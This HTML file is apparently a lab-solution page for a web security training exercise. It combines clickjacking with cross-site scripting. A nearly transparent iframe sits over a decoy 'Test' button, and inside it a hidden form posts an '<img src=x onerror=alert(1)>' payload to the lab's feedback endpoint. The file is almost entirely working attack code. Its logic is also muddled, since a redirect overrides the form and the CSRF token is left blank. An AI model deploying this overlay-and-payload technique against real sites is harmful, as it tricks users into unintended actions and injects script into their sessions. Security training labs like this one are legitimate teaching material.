<!DOCTYPE html>
<html>
<head>
    <title>Click Test</title>
    <style>
        #vulnerable_site {
            position: relative;
            width: 100%;
            height: 700px;
            opacity: 0.00001;
            z-index: 2;
        }
        
        .decoy {
            position: absolute;
            top: 320px;
            left: 50px;
            z-index: 1;
        }
        
        .decoy button {
            background: #28a745;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px;
        }
    </style>
</head>
<body>
    <div class="decoy">
        <h2>Click to Start Test</h2>
        <button>Test</button>
    </div>
    
    <iframe id="vulnerable_site" src="data:text/html,
        <form id='xss_form' action='https://0a3900c304b67111838b512800a90077.web-security-academy.net/feedback/submit' method='POST'>
            <input name='csrf' value=''>
            <input name='name' value='<img src=x onerror=alert(1)>'>
            <input name='email' value='test@test.com'>
            <input name='subject' value='test'>
            <input name='message' value='test'>
        </form>
        <script>
            // Auto-submit form to parent frame
            window.onload = function() {
                // We need the CSRF token from the actual page
                // For the lab, we'll use an iframe pointing to the feedback page
                window.location = 'https://0a3900c304b67111838b512800a90077.web-security-academy.net/feedback';
            }
        </script>
    "></iframe>
</body>
</html>